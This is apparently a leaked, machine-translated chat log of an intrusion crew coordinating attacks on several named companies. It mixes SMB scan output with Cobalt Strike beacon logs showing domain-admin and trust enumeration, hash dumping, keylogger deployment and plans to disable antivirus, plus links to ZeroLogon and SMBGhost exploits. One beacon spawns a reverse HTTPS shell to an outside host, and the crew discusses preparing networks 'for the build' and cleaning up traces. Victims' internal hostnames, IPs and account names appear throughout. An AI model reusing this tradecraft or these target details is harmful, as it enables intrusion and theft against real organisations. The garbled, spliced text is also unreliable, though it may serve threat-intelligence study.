3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5w 3d 2h 39m 0s) (guid:{c12b2df9-e1c6-4069-987b-dccc2a471647}) (authentication domain:AD) [+] 172.16.200.172:445 - Host is running Windows 2016 Datacenter (build:14393) (name:YONDER) (domain:AD) [*] 172.16.200.174:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 3h 48m 35s) (guid:{328035ff-a3cf-4af6-b6aa-15c8741b1954}) (authentication domain:AD) [+] 172.16.200.174:445 - Host is running Windows 2016 Datacenter (build:14393) (name:CERBERUS) (domain:AD) 
[*] 172.16.200.183:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 5h 54m 41s) (guid:{64e53680-fa39-43c8-8f8e-709f22e8dddd}) (authentication domain:AD) [+] 172.16.200.183:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:SCANTRON-PS) (authentication domain:AD) [*] 172.16.200.184:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:4d 4h 48m 23s) (guid:{598b41e0-98da-4443-8b3a-50f68af69fe8}) (authentication domain:AD) [+] 172.16.200.184:445 - Host is running Windows 2016 Datacenter (build:14393) (name:SCCM) (domain:AD) [*] 172.16.200.185:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5d 3h 57m 31s) (guid:{07b1d031-4dd2-4379-ad87-49bbec017527}) (authentication domain:AD) [+] 172.16.200.185:445 - Host is running Windows 2016 Datacenter (build:14393) (name:TMS) (domain:AD) [*] 172.16.200.188:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5w 2d 6h 16m 46s) (guid:{d7e060be-5b89-4fb2-aed1-447aa4efd919}) (authentication domain:AD) [+] 172.16.200.188:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-APP) (domain:AD) [*] 172.16.200.189:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:4d 6h 1m 56s) (guid:{4a5974d5-91df-4368-9e7c-fe3d5672650c}) (authentication domain:AD) [+] 172.16.200.189:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-ASYNC) (authentication domain:AD) [*] 172.16.200.191:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:12w 6d 17h 18m 49s) (guid:{d89d0ba7-60a3-4343-8014-cc2599518052}) (authentication domain:AD) [+] 172.16.200.191:445 - Host is running Windows 2012 
R2 Standard (build:9600) (name:RECRUIT-DB) (authentication domain:AD) [*] 172.16.200.192:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5w 5d 17h 21m 14s) (guid:{de310876-e6e9-4c88-98f3-8115cd355a33}) (authentication domain:AD) [+] 172.16.200.192:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-TESTAPP) (domain:AD) [*] 172.16.200.194:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:5d 5h 49m 33s) (guid:{9232b025-468c-4299-a42a-b3d907087a20}) (authentication domain:AD) [+] 172.16.200.194:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:RECRUIT-TESTDB) (domain:AD) [*] 172.16.200.201:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:8w 4d 22h 43m 14s) (guid:{4554f05b-d2bb-4360-8865-ddbe7471fc85}) (authentication domain:AD) [+] 172.16.200.201:445 - Host is running Windows 2016 Datacenter (build:14393) (name:BAILEY) (domain:AD) [*] 172.16.200.203:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{e99ea7d1-5c89-4ae0-b047-78f326de10d8} (authentication domain:AD) [*] 172.16.200.206:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5d 5h 5m 47s) (guid:{e0c5eab0-e28b-4a1d-b71a-025035e36430}) (authentication domain:AD) [+] 172.16.200.206:445 - Host is running Windows 2016 Datacenter (build:14393) (name:TERMINUS) (domain:AD) [*] 172.16.200.210:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:2d 12h 1m 14s) (guid:{a847ccbe-32a9-4d56-a2d5-ca2953739b62}) (authentication 
domain:AD) [+] 172.16.200.210:445 - Host is running Windows 2016 Datacenter (build:14393) (name:COLL-API) (domain:AD) [*] 172.16.200.214:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (uptime:5d 4h 6m 26s) (guid:{216b6279-4ffe-430a-9444-0d091cdaa779}) (authentication domain:AD) [+] 172.16.200.214:445 - Host is running Windows 2016 Datacenter (build:14393) (name:CROA-DB) (domain:AD) [*] 172.17.6.9:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.6.7:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.9.6:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.9.7:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.9.39:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{70db2ac9-f957-4efe-a7b4-7287b42b2b59}) (authentication domain:AD) [*] 172.17.10.36:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{faa6e913-de51-4214-9e63-459d17dd919a}) (authentication domain:AD) [*] 172.17.10.2:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.10.3:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.2:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.3:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.5:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.6:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.7:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 
172.17.202.10:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.11:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.16:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.17:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.18:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.19:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.20:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.22:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.23:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.24:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.25:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.26:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.27:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.28:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.29:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.30:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.31:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.32:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.33:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.34:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.35:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.37:139 - SMB Detected (versions:) (preferred dialect:) 
(signatures:optional) [*] 172.17.202.38:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.39:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.40:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.41:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.42:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.44:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.43:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.45:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.46:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.47:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.48:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.49:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.50:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.51:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.52:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.53:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.54:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.55:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.57:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.59:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.60:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.61:139 - SMB Detected 
(versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.62:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.63:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.64:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.65:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.66:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.67:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.68:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.70:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.71:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.72:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.74:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.75:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.76:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.82:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{69662d727265-7265-0079-0000000000000000}) (authentication domain:R-FIERY) [*] 172.17.202.77:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.78:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.81:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 172.17.202.187:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [+] 172.17.202.187:445 - Host is running VxWorks (workgroup:MSHOME) [*] 172.17.202.84:445 - SMB Detected (versions:1, 2, 
Anyone who has problems with dedicas - come to me :sunglasses: for questions to @user8, he is a guru in this, I'll send you a scan of the network

Valid account, log in under it and download the client for vpn

user9 user8: Acquired.

Taken.

3 out of 4 sorted out?

+@user8 there you got 2 more sessions from that netchat - orenco.com.telecomlabsinc.com input coba, went sessions first took 2 did not take 3 took

https pick up yourselves, 4 pieces ready, I'll give them here and you disassemble them yourself, just write down who picked up what

on the new sootv pulling from the input above the grid in the work to finish on the old

and another announcement, you koba update http://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon input coba

https://www.exploit-db.com/exploits/48537

well in general you should look for additional vector and additional task to find this case) in the rep lies only in the rep and the folder in the folder which he opens lies in the folder ëèosalvot here pay attention to the gif https://github.com/danigargu/CVE-2020-0796

:thinking: but i need to look and there is another option with rce) like on the ms17-010? for goost need a session, no?
and one more thing, about dead spots, did you do scans on the smbgost? and today put the build

yes ok, let's do a story there and gather information on the offsets avera) but i was there yesterday, i don't know how to check it but i don't know if it's critical, the scale is small and looking for ways to unscramble it)

ok then solve the problem with EDR on all servers there are pinged +- 100-80252 machines without a server how many users? 0 Objects returned are there any trusts? 20 pcs.... seriously?)

file already if there is not enough buffer length let's mark at once that if it fits in the message - write in the message

How many servers are there in total? If there are not many you can try to shut down AV by hand, collect analytics on this and we will start with the number of servers. These are most likely the most critical of some

@user3 found malware and bitdefender on itc-us.com servers had 4 servers? Or am I confused with another one?

Using GPO for Deployment

To install SecureAnywhere using GPO, you should have experience with Microsoft's Active Directory and the GPO editor. You can also watch a video on how to use GPOs at How to Deploy Using Group Policy - SecureAnywhere Business.
To install SecureAnywhere using GPOs: From the following location, download the SecureAnywhere MSI installer to a network share: http://anywhere.webrootcloudav.com/zerol/wsasme.msi Downloading the file makes it accessible to all endpoints on which you will deploy SecureAnywhere. Go to the server that is the domain controller for the deployment group. Open the GPO editor on the domain controller and create a policy for the deployment group. Assign SecureAnywhere to all endpoints that belong to the Organizational Unit where the Group Policy is created. SecureAnywhere installs on the endpoints in the group when they restart. ``Two hours we work with these, then there will be new sessionsGood afternoonits-us.com - have pkgprod.com - are what about the sessions?:flag_il:Good morning,good night to you allTomorrow by 3)Good, then we start at 3, the amount of work for tomorrow does not changeI only get out of bed at 14 I think that from now until tonight you have time to prepare the networks for the buildI do not understand is it convenient for you and you sleep until then?can even earlierWhy at 14? Write to the group on the current networks statusTomorrow we need to have two networks ready for the buildtomorrow by 14:00 still an hour we are working on the desktop shortcut to the web, something on the sol ...they seem to have such a system, but it also needs creeds)))) I'm not saying that it does not work at all do not save access to avs in browsers, but in password storage systems? keylogger koba* in sprouselaw from malware account keylogger and got it worked at all? keylogger koba itself is not the most working option in working except for keylogger, it turns out? 
they don't save the credentials from av in chrome anywhere

keylogger put today on a bunch of machines, as a result keystrokes - roam-away-field as an option - access only in working hours

I've already gone through a shitload of machines (where admins sit), no access from anywhere, it seems there are backups going to the cloud if admin not found

How to look for cmd version disable on servers, etc. in other networks?

no about it we did not find the av, admin or do you mean the other?

build what build?) today we have time to put the build? I have already offed the session

this is the account for the ASP.NET, most likely only used when installing it or something like that no user

[-] 10.7.0.199:445 - Account lockout detected on 'ASPNET', skipping this user. The account is disabled.

What is it? ASPNET is blocked everywhere (I've taken dumps everywhere) no yes( found another LA and microadmin check them out

yes, in the process you still need to remove the hashes everywhere + these are the servers as I understand it? check everywhere we can move now they are citrix hosts if i understand correctly Checked the process at all and a couple of hashdumps removed no yes and LA (most likely) everywhere the same(

was the mikehashdump taken off?

it's weird, everyone's got the same fucking password + dll in place?
``` beacon> shell rundll32 C:\Windows\system32\mrtsvc.dll entryPoint [*] Tasked beacon to run: rundll32 C:\Windows\system32\mrtsvc.dll entryPoint [+] host called home, sent: 81 bytes beacon> shell schtasks /query [*] Tasked beacon to run: schtasks /query [+] host called home, sent: 46 bytes [+] received output: Folder: \ TaskName Next Run Time Status ======================================== ====================== =============== Adobe Acrobat Update Task 2/3/2021 1:00:00 PM Ready ControlUp autoupdate#10514 2/3/2021 12:28:56 PM Ready gpoAgentDeploy N/A Ready Optimize Start Menu Cache Files-S-1-5-21 N/A Disabled Optimize Start Menu Cache Files-S-1-5-21 N/A Ready ``Log from biconadai command to launch-fixed? ``` corp.televisa.com.mx 10.7.5.196 SYSTEM * CORPKIOVDAPGM01 ``LA''. Teemo[SFE16537]pjfrancocru/16872|2021Feb03 21:05:28> shell net localgroup Administradores [*] Tasked beacon to run: net localgroup Administradores [+] host called home, sent: 61 bytes [+] received output: Nombre de alias Administradores Comentario Miembros ------------------------------------------------------------------------------- Administrador CORP\Domain Admins CORP\EndPoint CORP\pjfrancocru CORP\SCMusr CORP\SoporteDXC Se ha completado el comando correctamente. ``you have YES? user9@tl1 add @user9 here i yanked it from the browser yesterday, i thought it would fit this from kerb?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=hGah3m4Ca2EBzcpg6) the creds are not valid (+there came?put the loadpokaem1 min@tl1 pulse session please://phanein.televisa.com.mx/vpn/logout.htmlb through the push configured then(Does not come to his mail on mail#1-done-crispregional-org what?the other one's in work i'm watching this one out of the corner of my eye while the other one's in work i'm waiting till it's on, when it's on i'll jump right away, i have everything ready, this is just a screen, is the VPN off in the domain?) 
as mantra dont forget sessions in slip everyone good night, then until tomorrow by 7 and go on vacation then finish tomorrow you are tough) so far the stats look like this + this is the domain where we are TECHNISTONE.LOCAL - can't get through, no overlap of users and users/groups from other domains with rights WI.RWP.COM is some kind of a dead domain, just wine 2003 ``` WILSONART.COM + CN.WILSONART.COM + RALPHWILSON.COM + ARBORITE.COM + POLYREY.NET + EU.WILSONART.COM + UK.WILSONART.COM + BUSHBOARD.CO.UK + SLF.LOCAL + RESOPAL.LAN + TECHNISTONE.LOCAL no intersections WI.RWP.COM 2003 mb old/inactive domain POLYREY.COM Quarantined RESOPAL.GER Quarantined ``` found avs, backups, spheres and creeds to us region left backups/spheres in europe Give me a brief report on the work so0.dead.forestriverinc.com what happened here?`` user5 >sAMAccountName: TIMECLOCK41$ >operatingSystem: Windows 8.1 Pro ``put the server sabinet on the 445 portas I'll look at the rest, maybe I missed something there only 301 tachksts no? ok, it's a deal then I'll help you here as much as I can work there + you work with me in the mouth? give 5 minutes now quickly sort out the servers and prepare it, it's not clear yet what the cost here how much? umm... 
i don't even see it, i'll re-scan it, it's a tool changer, i can't see the trusts file Teemo[PDIPRODWEB]SYSTEM */728|2020Dec25 20:05:02> net domain_controllers [*] Tasked beacon to run net domain_controllers [+] host called home, sent: 105071 bytes [+] received output: Domain Controllers: Server Name IP Address ----------- ---------- WWDC1 192.168.0.228 WWDC2 192.168.0.222 Teemo[PDIPRODWEB]SYSTEM */728|2020Dec25 20:05:18> net domain_trusts [*] Tasked beacon to run net domain_trusts [+] host called home, sent: 105066 bytes [+] received output: List of domain trusts: 0: WATERWAY waterway.com (Forest tree root) (Primary Domain) (Native) ``` well not visible yet) no trusts? ``DA` ``` Administrator Applied blauer datavault DBunte djarden domainrestore gkeller mapusatera mharper Quser SEnglert ServerAdmin$ techpartners veeam_admin ``` . ``EA`` ``` Administrator CSE domainrestore mapusatera ResultsTech ServerAdmin$ I will first subdata on the domain then yank dxinx right here on the progress of the tasks but at least you will know that there is something nearby just do not get there if chet will find, most likely will restrict the domain in another forest or something like thataga, there is a feeling that other networks must be where tonya 445postay tell from the current subnet on /16 maskstrano, trusts were not and all servers) well in adcom their -42 total net small however Portscan on the computers that are visible (15 pcs) on these ports ``` 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 ``bad of course ... 
and then as if the account is abandoned, because there are no files it apparently only works through the web da, this is in the plans to do nowbrazers no, but what is the current polzak there on the pc? in mssql can put the brute force would be a, patched services mssql and so the same zerologon option? there are several such exploits, but I have not attracted it and in sharp or c there is no them (and in c they are always fallen) ah, well, only 2020-0796vertical within the current pc) I do not understand a little bit what it means within vpe) within vredlere exploits? did not understand) I mean lpe -> vredlere smbghost, msf have not pulled it tried? on gpp empty, zoopu, but I have not collected the dictionary because I haven't used the browser here) and passwords are nowhere else in fschet by the way on gpp? collected from browsers? mm-hmm, so you can brute force without loca``on Minimum password age (days): 1 Maximum password age (days): 42 Minimum password length: 7 Length of password history maintained: 24 Lockout threshold: Never Lockout duration (minutes): 30 Lockout observation window (minutes): 30 ``Give me a password policy no? there are a few 2008da there are some servers lol)2003, hp? skilkerb there are no passwords in usersmm, but yes one...in usersm there is what? but it does not lada MCLOUD-SH32-6.mgrmedu.com ``` your current one? ``He's a dense one,`` but he's not ``sharfinder.`` Global Group memberships *MCLOUD-PORTAL-PINSTU *MSSO-POHS363 *Domain Users ``Whether or not I run the tools from the toolkit, by the way, does it have any privileges? If output to a file - I throw in a new session - the files are there but the tools work?same) psinject? lazagne.exeadfind also kicked out the session after it worked out execute-assembly? you have coba attached? only windef in your processes which av? no luck yet i couldn't find the credentials. no user anywhere sessions are dropped after you run any tools like sitbelt, etc.and what tools did you run? 
beacon> shell net localgroup administrators [*] Tasked beacon to run: net localgroup administrators [+] host called home, sent: 60 bytes [+] received output: Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator mgrmedu\AWS Delegated Server Administrators mgrmedu\Domain Admins mgrmedu\M-DLGTD-SVR-ADM Rapyder-admin ssm-user The command completed successfully. beacon> shell net group "Domain admins" /dom [*] Tasked beacon to run: net group "Domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain mgrmedu.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator The command completed successfully. beacon> shell net group "Enterprise admins" /dom [*] Tasked beacon to run: net group "Enterprise admins" /dom [+] host called home, sent: 65 bytes [+] received output: The request will be processed at a domain controller for domain mgrmedu.com. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator The command completed successfully. 
Domain Controllers: Server Name IP Address ----------- ---------- WIN-BA6SF1HOCKI 10.70.4.252 WIN-QL5L2UP8A9V 10.70.3.236 `````` 172.17.70.10 vSphere - HQ-VCENTER-2.evo.local - Summary `````` walking isoutsource https://172.17.70.52:8444 network monitoring http://192.168.80.1/ Meraki Cisco https://172.17.70.52:8443 unifi-network I can't believe this is happening.+tout flylodem put the same shelsession droppedthe cartel assembly just noticed that the top of the whole line is his nameThe Pink Panthers cartel criminal thunderstorm like a stranger looking directly into the soul (c) Looking for credits from the sphere and avv #wilsonart-com so far nothing... of the current crits no admin, no vulnerability on ms17/netapi, at least on the servers, GPPP does not give anything, orb no quietly how are you doing? ok#alloypolymers-com preparing to close, divide themselves on both networking all hello, I will be late tonight and while I will not you work on #wilsonart-com and #alloypolymers-comok, good nighta, tomorrow by 6 to what time?good night to all thank you all for tonight) and until the end of the week for sure #wilsonart-com and tomorrow according to the plans of @user3 network for the closing join me fast, coherent, accurateFirst I'll tell you that you're great, very good work give 10 minkyAndryukha we have a case, maybe close all the knights? + here all `missme.com` move on Yes I'm watching the half eye ... and I said that did not come Well personally you ask me, I do not do balimore, what's it to me? It's strange that the fix on the polzac, when the servers jumped the hell knows when@user4 ?) have not thought of that? 
you can already think that you can search for login through passwords vpnUsers you probably know ip vpn I'm what you have ad infos, you have dsink and you?) then what do you mean by "accesses"? accesses above in the conf, no password and you can't find accesses from vpnA what's up with the polozack? what's up with vpn off? 
Potential targets in NDLEADING unlikely of course, they changed passwords YES on 21-22 and there are only two check this one in LA but check this password on other L.A.C.s there's a shitload of linuxes we could get into and where is 445 open and there are only 10 npc in it? all within one oushka and no access there and 1 server one we see 3 user subnets and we can go anywhere there on the server subnet did you check where? first two no, third user8 I think I checked and it doesn't work either and 4 do not remember check if they do not open us new cars? one domain microadministrator seems to have one and you didn't take off the clear pass? 
right, we rem sap has different passammmms la We found yesterday that the servers (not DK) have the same LA, but we haven't been able to unroot yet It looks something like this we'd love to)let's try to get in deeper and get a foothold there todayYes. They seem to be rebuilding the grid. There's new computers. I thought there was some progress, huh? Strange that all functions are affected I can not tell all by myself I will try to spawn from another user from another car) it as spawn did not help work through remotno I would try respawn try cmd substitute what rights to you? beacon> spawn vew [*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (hitark.com:443) [+] host called home, sent: 840 bytes [-] could not spawn C:\Windows\syswow64\wusa.exe: 740 Try to spawn a new session only one (on one server), nothing to move on all sessions? The same crap on execute-assembly... it doesn't matter what to run... 
I copied this piece from an attempt to run portcan this what for? why do you need this server? ``` [-] could not spawn C:\Windows\syswow64\wusa.exe: 740 [-] Could not connect to pipe: 2 ``Check through rubeuswow on theoretically related servers ticketpngc - all the credentials are valid, but no one has rights. there are 21 cars on the network and they are servers. Inway is not catching anything yet. The impression is that they all work through RDP. In addition, they seem to be all virtual machines (but not sure yet - I am checking) #pcsb-org no access to neighboring domains ports are being scanned, morphs are being checked for nasa and other things @user7 and i'm digging tvs what are your current tasks? for now what do you have to work with? are there any new networks coming today? hi:man_raising_hand:is the internet working? hi:space_invader:everyone hello!!!!`` We've set up a timeserver, let's try to pierce through it. 
https://vc1.rtpco.local/websso/SAML2/SSO/vsphere.local `10.4.0.223 `https://vmwaremgr.winona.rtpco.local `How are you doing? Do you have time to close today? It's okay, we can distribute it quietly and make it in three trusts200 pcsWait, not much. and servers? I have not counted yet, about 2000 machines? [DC] 'us alloyp'. 
[DC] 'us.alloypolymers.com' will be the domain [DC] 'GAHDC01.us.alloypolymers.com' will be the DC server [DC] 'winona.rtpco.local' will be the user account ERROR kull_m_rpc_drsr_CrackName ; CrackNames (name status): 0x00000002 (2) - ERROR_NOT_FOUND ``Till tomorrow)`` do you thank you, see you tomorrow)``Don't forget to clean up after yourself,`` Thank you all, good night)`` So, well, that's it. Today that's all, throw the session in the slip for 100 seconds +-, tomorrow we will continue) when trying to load a non-formed file writes an error (>4Gb) When you remove the ad info, remove the entire, all 6 files and download the same 6 files in the confab) Files over 50 meters are archived. Files over 200 mb in a compressed state are not downloaded through the cobaDon't forget to delete files created in the process of running commands! Today up to 12 daTo the second group alsoTry to work with her, maybe there faster copeIn the first group coba new session `` [*] Tasked beacon to list processes [+] host called home, sent: 12 bytes [*] Process List with process highlighting [*] Current Running PID: Yellow 892 [*] Explorer/Winlogon: BLUE [*] Admin Tools: LIGHT BLUE [*] Browsers: GREEN [*] AV/EDR: RED ````.` .\[text\]\[text]\[qqq\]\[\url{https://katex.org/}\]sessions are gone༼ つ ◕_◕ ༽つ and what about the task?\{\a'\a'\underline{you yo piraka} doesn't work)\overgroup{Ingeborge Dapkunaite}{and how katya works\overgroup{Ingeborge Dapkunaite}? The mistakes of youth were easy to get away with. Ah, youth, - the magic sound of a whistle. We often sawed off the bough beneath us. Now we are not the same, and the bitches have grown old. ``Thank you at the very bottom of the field``vfhrth````` `````` right here) `````'marker 123 007user1 - charmer, he has a message for me in a personal) + + in pm does not leave a message++All here? 
hahaI'm cheerfulGreat, who is not with us yet? Let them write in the slack works like everythinghttp://joxi.ru/D2PNv3QUJB5qNrI got a message, but to read it nowhereNo access to the PM we have the rights are cuthttp://joxi.ru/823GVzpTru/823GVzpT8a06L2+1 white screen with all white+also white screen can not? in slek otpisiteen not fit the passwords at 3hi not all can enter-no one came to personal messages? also white screenThere is nothing at all also the field for entering a message? I have a white background, no one personally with me does not open? user8 on this, https://mediaeveryonecom/account/security - encryption E2E and reset the keyI can not write in person, please make me a human nickname Stalinnu me and the user is goodI do not understand what encryption password is required of me if you want uniqueness - nicknames in private) +++ got to open kmd but still could not pull in the cob, but managed to pull in ptsh, tomorrow will get all the information and will be untwisteddatax there's a flag -keep, when it gathersaablocks the session process kobydelka new not deleted whytomorrow by 3pick up, sessions in slipskoronu already 12takte guys you threw, no LA-parole not found the LA - admin and tsun-tsunetdo system does not risea, there vpn offu me in koba session what did not help?in tpsh did not fly? psh did not help? yes it's from here? a few pieces i threw out it ...? give me a screenshot of the lk without a VPN have anything to work with? ``` http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx ``` ipn: Sage i have no configs, i've tried everything manually, then i went through SauronEye, it's empty now i'll try it. i thought you were asking about arma or servda) fuck, you mean armitage ? 
only arma is available, i can't pull it there try to pull arma, win 10 now i'll try again in pts and arma ? that's my problem this thing was on tasks@user7 you have what on tasks was before? still on the same - need to build dll then to mebug tpsh because of a socket chokeupuponovy stOoOw came as much as three times does not come into it either i read minds, or more details for the question what with ptsh?who needs to bild the shellcode to @user7@user7 was ready to volunteer not raised the sessionWhy? i need a volunteer can generate a new dll? i launch, the process hangs, but the session did not come dll? i can not draw in the coba and ptsh, kmd is closed but opened, does not let you run any exe file today till 12soglas, in the personal areaa did you order?) do not forget to make me an account in ptsh) check ipn and other things `` beacon> shell net group "Domain Admins" /dom [*] Tasked beacon to run: net group "Domain Admins" /dom [+] host called home, sent: 61 bytes [+] received output: 这项请求将在域 WORKGROUP 的域控制器处理。 发生系统错误 1355。 指定的域不存在,或无法联系。 ``` This request will be processed on the domain controller of the WORKGROUP domain. There was a system error 1355. The specified domain does not exist or cannot be contacted. beacon> net domain [*] 